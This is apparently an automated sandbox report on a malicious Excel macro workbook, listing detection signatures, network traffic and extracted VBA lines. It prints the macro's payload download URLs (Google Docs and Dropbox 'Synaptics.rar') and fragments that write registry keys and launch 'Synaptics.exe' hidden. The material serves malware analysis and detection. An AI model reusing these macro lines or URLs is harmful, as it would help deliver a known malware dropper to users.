Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
universityform.xlsm

Overview

General Information

Sample name:universityform.xlsm
Analysis ID:1582321
MD5:d04491647385cc373152651890cbc6e0
SHA1:b288e5e87ce113af41881431c7004904f6d6ba89
SHA256:2ad9a7b364109c68f911729a3dcde001e6df45e80164f87b0054e8e78161fe99
Tags:xlsmuser-JAMESWT_MHT
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Machine Learning detection for sample
Office process queries suspicious COM object (likely to drop second stage)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

  • System is w11x64_office
  • EXCEL.EXE (PID: 6836 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
    • splwow64.exe (PID: 6148 cmdline: C:\Windows\splwow64.exe 12288 MD5: AF4A7EBF6114EE9E6FBCC910EC3C96E6)
  • EXCEL.EXE (PID: 7948 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\universityform.xlsm" MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 142.250.184.206, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6836, Protocol: tcp, SourceIp: 192.168.2.24, SourceIsIpv6: false, SourcePort: 49775
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.24, DestinationIsIpv6: false, DestinationPort: 49775, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6836, Protocol: tcp, SourceIp: 142.250.184.206, SourceIsIpv6: false, SourcePort: 443
Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, ProcessId: 6836, TargetFilename: C:\Users\user\Desktop\~$universityform.xlsm
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: universityform.xlsmAvira: detected
Source: universityform.xlsmVirustotal: Detection: 66%Perma Link
Source: universityform.xlsmReversingLabs: Detection: 68%
Source: universityform.xlsmJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: global trafficDNS query: name: docs.google.com
Source: global trafficDNS query: name: www.dropbox.com
Source: global trafficDNS query: name: www.dropbox.com
Source: global trafficTCP traffic: 192.168.2.24:49775 -> 142.250.184.206:443
Source: global trafficTCP traffic: 192.168.2.24:49777 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49778 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49799 -> 142.250.184.206:443
Source: global trafficTCP traffic: 192.168.2.24:49801 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49802 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49775 -> 142.250.184.206:443
Source: global trafficTCP traffic: 192.168.2.24:49775 -> 142.250.184.206:443
Source: global trafficTCP traffic: 192.168.2.24:49775 -> 142.250.184.206:443
Source: global trafficTCP traffic: 192.168.2.24:49775 -> 142.250.184.206:443
Source: global trafficTCP traffic: 192.168.2.24:49775 -> 142.250.184.206:443
Source: global trafficTCP traffic: 192.168.2.24:49775 -> 142.250.184.206:443
Source: global trafficTCP traffic: 192.168.2.24:49775 -> 142.250.184.206:443
Source: global trafficTCP traffic: 192.168.2.24:49775 -> 142.250.184.206:443
Source: global trafficTCP traffic: 192.168.2.24:49775 -> 142.250.184.206:443
Source: global trafficTCP traffic: 192.168.2.24:49775 -> 142.250.184.206:443
Source: global trafficTCP traffic: 192.168.2.24:49775 -> 142.250.184.206:443
Source: global trafficTCP traffic: 192.168.2.24:49775 -> 142.250.184.206:443
Source: global trafficTCP traffic: 192.168.2.24:49777 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49777 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49777 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49777 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49777 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49777 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49777 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49777 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49777 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49777 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49777 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49778 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49778 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49778 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49778 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49778 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49778 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49778 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49778 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49778 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49778 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49778 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49799 -> 142.250.184.206:443
Source: global trafficTCP traffic: 192.168.2.24:49799 -> 142.250.184.206:443
Source: global trafficTCP traffic: 192.168.2.24:49799 -> 142.250.184.206:443
Source: global trafficTCP traffic: 192.168.2.24:49799 -> 142.250.184.206:443
Source: global trafficTCP traffic: 192.168.2.24:49799 -> 142.250.184.206:443
Source: global trafficTCP traffic: 192.168.2.24:49799 -> 142.250.184.206:443
Source: global trafficTCP traffic: 192.168.2.24:49799 -> 142.250.184.206:443
Source: global trafficTCP traffic: 192.168.2.24:49799 -> 142.250.184.206:443
Source: global trafficTCP traffic: 192.168.2.24:49799 -> 142.250.184.206:443
Source: global trafficTCP traffic: 192.168.2.24:49799 -> 142.250.184.206:443
Source: global trafficTCP traffic: 192.168.2.24:49799 -> 142.250.184.206:443
Source: global trafficTCP traffic: 192.168.2.24:49799 -> 142.250.184.206:443
Source: global trafficTCP traffic: 192.168.2.24:49799 -> 142.250.184.206:443
Source: global trafficTCP traffic: 192.168.2.24:49801 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49801 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49801 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49801 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49801 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49801 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49801 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49801 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49801 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49801 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49801 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49802 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49802 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49802 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49802 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49802 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49802 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49802 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49802 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49802 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49802 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49775 -> 142.250.184.206:443
Source: global trafficTCP traffic: 142.250.184.206:443 -> 192.168.2.24:49775
Source: global trafficTCP traffic: 192.168.2.24:49775 -> 142.250.184.206:443
Source: global trafficTCP traffic: 192.168.2.24:49775 -> 142.250.184.206:443
Source: global trafficTCP traffic: 142.250.184.206:443 -> 192.168.2.24:49775
Source: global trafficTCP traffic: 142.250.184.206:443 -> 192.168.2.24:49775
Source: global trafficTCP traffic: 192.168.2.24:49775 -> 142.250.184.206:443
Source: global trafficTCP traffic: 142.250.184.206:443 -> 192.168.2.24:49775
Source: global trafficTCP traffic: 142.250.184.206:443 -> 192.168.2.24:49775
Source: global trafficTCP traffic: 192.168.2.24:49775 -> 142.250.184.206:443
Source: global trafficTCP traffic: 142.250.184.206:443 -> 192.168.2.24:49775
Source: global trafficTCP traffic: 192.168.2.24:49775 -> 142.250.184.206:443
Source: global trafficTCP traffic: 192.168.2.24:49775 -> 142.250.184.206:443
Source: global trafficTCP traffic: 142.250.184.206:443 -> 192.168.2.24:49775
Source: global trafficTCP traffic: 192.168.2.24:49775 -> 142.250.184.206:443
Source: global trafficTCP traffic: 142.250.184.206:443 -> 192.168.2.24:49775
Source: global trafficTCP traffic: 192.168.2.24:49775 -> 142.250.184.206:443
Source: global trafficTCP traffic: 142.250.184.206:443 -> 192.168.2.24:49775
Source: global trafficTCP traffic: 142.250.184.206:443 -> 192.168.2.24:49775
Source: global trafficTCP traffic: 192.168.2.24:49775 -> 142.250.184.206:443
Source: global trafficTCP traffic: 142.250.184.206:443 -> 192.168.2.24:49775
Source: global trafficTCP traffic: 142.250.184.206:443 -> 192.168.2.24:49775
Source: global trafficTCP traffic: 192.168.2.24:49775 -> 142.250.184.206:443
Source: global trafficTCP traffic: 192.168.2.24:49775 -> 142.250.184.206:443
Source: global trafficTCP traffic: 142.250.184.206:443 -> 192.168.2.24:49775
Source: global trafficTCP traffic: 192.168.2.24:49777 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49777
Source: global trafficTCP traffic: 192.168.2.24:49777 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49777 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49777
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49777
Source: global trafficTCP traffic: 192.168.2.24:49777 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49777
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49777
Source: global trafficTCP traffic: 192.168.2.24:49777 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49777 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49777
Source: global trafficTCP traffic: 192.168.2.24:49777 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49777
Source: global trafficTCP traffic: 192.168.2.24:49777 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49777
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49777
Source: global trafficTCP traffic: 192.168.2.24:49777 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49777 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49777 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49777
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49777
Source: global trafficTCP traffic: 192.168.2.24:49778 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49778
Source: global trafficTCP traffic: 192.168.2.24:49778 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49778 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49778
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49778
Source: global trafficTCP traffic: 192.168.2.24:49778 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49778
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49778
Source: global trafficTCP traffic: 192.168.2.24:49778 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49778 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49778
Source: global trafficTCP traffic: 192.168.2.24:49778 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49778
Source: global trafficTCP traffic: 192.168.2.24:49778 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49778
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49778
Source: global trafficTCP traffic: 192.168.2.24:49778 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49778 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49778
Source: global trafficTCP traffic: 192.168.2.24:49778 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49778
Source: global trafficTCP traffic: 192.168.2.24:49799 -> 142.250.184.206:443
Source: global trafficTCP traffic: 142.250.184.206:443 -> 192.168.2.24:49799
Source: global trafficTCP traffic: 192.168.2.24:49799 -> 142.250.184.206:443
Source: global trafficTCP traffic: 192.168.2.24:49799 -> 142.250.184.206:443
Source: global trafficTCP traffic: 142.250.184.206:443 -> 192.168.2.24:49799
Source: global trafficTCP traffic: 142.250.184.206:443 -> 192.168.2.24:49799
Source: global trafficTCP traffic: 192.168.2.24:49799 -> 142.250.184.206:443
Source: global trafficTCP traffic: 142.250.184.206:443 -> 192.168.2.24:49799
Source: global trafficTCP traffic: 142.250.184.206:443 -> 192.168.2.24:49799
Source: global trafficTCP traffic: 192.168.2.24:49799 -> 142.250.184.206:443
Source: global trafficTCP traffic: 142.250.184.206:443 -> 192.168.2.24:49799
Source: global trafficTCP traffic: 192.168.2.24:49799 -> 142.250.184.206:443
Source: global trafficTCP traffic: 192.168.2.24:49799 -> 142.250.184.206:443
Source: global trafficTCP traffic: 142.250.184.206:443 -> 192.168.2.24:49799
Source: global trafficTCP traffic: 192.168.2.24:49799 -> 142.250.184.206:443
Source: global trafficTCP traffic: 142.250.184.206:443 -> 192.168.2.24:49799
Source: global trafficTCP traffic: 192.168.2.24:49799 -> 142.250.184.206:443
Source: global trafficTCP traffic: 142.250.184.206:443 -> 192.168.2.24:49799
Source: global trafficTCP traffic: 142.250.184.206:443 -> 192.168.2.24:49799
Source: global trafficTCP traffic: 142.250.184.206:443 -> 192.168.2.24:49799
Source: global trafficTCP traffic: 192.168.2.24:49799 -> 142.250.184.206:443
Source: global trafficTCP traffic: 142.250.184.206:443 -> 192.168.2.24:49799
Source: global trafficTCP traffic: 142.250.184.206:443 -> 192.168.2.24:49799
Source: global trafficTCP traffic: 192.168.2.24:49799 -> 142.250.184.206:443
Source: global trafficTCP traffic: 192.168.2.24:49799 -> 142.250.184.206:443
Source: global trafficTCP traffic: 142.250.184.206:443 -> 192.168.2.24:49799
Source: global trafficTCP traffic: 192.168.2.24:49799 -> 142.250.184.206:443
Source: global trafficTCP traffic: 142.250.184.206:443 -> 192.168.2.24:49799
Source: global trafficTCP traffic: 192.168.2.24:49801 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49801
Source: global trafficTCP traffic: 192.168.2.24:49801 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49801 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49801
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49801
Source: global trafficTCP traffic: 192.168.2.24:49801 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49801
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49801
Source: global trafficTCP traffic: 192.168.2.24:49801 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49801 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49801
Source: global trafficTCP traffic: 192.168.2.24:49801 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49801
Source: global trafficTCP traffic: 192.168.2.24:49801 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49801
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49801
Source: global trafficTCP traffic: 192.168.2.24:49801 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49801 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49801
Source: global trafficTCP traffic: 192.168.2.24:49801 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49801
Source: global trafficTCP traffic: 192.168.2.24:49802 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49802
Source: global trafficTCP traffic: 192.168.2.24:49802 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49802 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49802
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49802
Source: global trafficTCP traffic: 192.168.2.24:49802 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49802
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49802
Source: global trafficTCP traffic: 192.168.2.24:49802 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49802 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49802
Source: global trafficTCP traffic: 192.168.2.24:49802 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49802
Source: global trafficTCP traffic: 192.168.2.24:49802 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49802
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49802
Source: global trafficTCP traffic: 192.168.2.24:49802 -> 162.125.66.18:443
Source: global trafficTCP traffic: 192.168.2.24:49802 -> 162.125.66.18:443
Source: global trafficTCP traffic: 162.125.66.18:443 -> 192.168.2.24:49802
Source: Joe Sandbox ViewIP Address: 162.125.66.18 162.125.66.18
Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: docs.google.com
Source: global trafficHTTP traffic detected: GET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: www.dropbox.com
Source: global trafficHTTP traffic detected: GET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: www.dropbox.com
Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: docs.google.com
Source: global trafficHTTP traffic detected: GET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: www.dropbox.com
Source: global trafficHTTP traffic detected: GET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: www.dropbox.com
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: docs.google.com
Source: global trafficHTTP traffic detected: GET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: www.dropbox.com
Source: global trafficHTTP traffic detected: GET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: www.dropbox.com
Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: docs.google.com
Source: global trafficHTTP traffic detected: GET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: www.dropbox.com
Source: global trafficHTTP traffic detected: GET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: www.dropbox.com
Source: global trafficDNS traffic detected: DNS query: docs.google.com
Source: global trafficDNS traffic detected: DNS query: www.dropbox.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:05:37 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-jqrAj6mEpumdAWIoNLK2jA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:06:47 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-sOz_rOskb48vPZBYrePENw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: vbaProject.binString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
Source: Primary1735553133404532100_67438946-7BD4-4B04-973F-9098DB32CC18.log.0.drString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.40/flatfontassets.pkg
Source: vbaProject.binString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778

System Summary

barindex
Source: universityform.xlsmOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
Source: universityform.xlsmOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: universityform.xlsmOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: universityform.xlsmOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: universityform.xlsmOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
Source: universityform.xlsmOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
Source: universityform.xlsmOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
Source: universityform.xlsmOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
Source: universityform.xlsmOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
Source: universityform.xlsmOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
Source: universityform.xlsmOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function SaveAsInj, String environ: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"Name: SaveAsInj
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function RegKeyRead, String wscript: Set myWS = CreateObject("WScript.Shell")Name: RegKeyRead
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function RegKeyExists, String wscript: Set myWS = CreateObject("WScript.Shell")Name: RegKeyExists
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function RegKeySave, String wscript: Set myWS = CreateObject("WScript.Shell")Name: RegKeySave
